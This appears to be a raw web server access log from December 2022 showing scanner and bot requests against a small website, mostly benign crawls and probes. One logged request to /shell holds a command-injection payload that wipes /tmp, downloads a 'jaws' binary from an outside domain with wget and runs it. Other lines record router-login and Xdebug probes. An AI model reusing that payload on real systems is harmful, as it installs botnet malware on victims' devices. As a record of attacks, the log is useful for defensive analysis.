183.136.225.32 - - [05/Dec/2022:01:01:15 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
194.55.186.124 - - [05/Dec/2022:01:02:07 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
170.64.134.166 - - [05/Dec/2022:01:03:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.134.166 - - [05/Dec/2022:01:03:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.134.166 - - [05/Dec/2022:01:03:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
223.99.170.39 - - [05/Dec/2022:01:04:32 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ neverwinwlaq.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
190.75.47.88 - - [05/Dec/2022:01:05:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
71.6.232.24 - - [05/Dec/2022:01:08:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
92.204.54.124 - - [05/Dec/2022:01:12:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; seocompany/0.6; +; )"
92.204.54.124 - - [05/Dec/2022:01:12:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
64.124.8.44 - - [05/Dec/2022:01:14:38 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
64.124.8.44 - - [05/Dec/2022:01:14:38 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
195.144.21.56 - - [05/Dec/2022:01:21:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.144.21.56 - - [05/Dec/2022:01:21:49 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
195.144.21.56 - - [05/Dec/2022:01:21:49 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
195.144.21.56 - - [05/Dec/2022:01:21:49 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
195.144.21.56 - - [05/Dec/2022:01:21:49 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
152.89.196.211 - - [05/Dec/2022:01:24:02 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
170.187.155.78 - - [05/Dec/2022:01:28:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
152.89.196.211 - - [05/Dec/2022:01:29:33 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:01:30:27 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
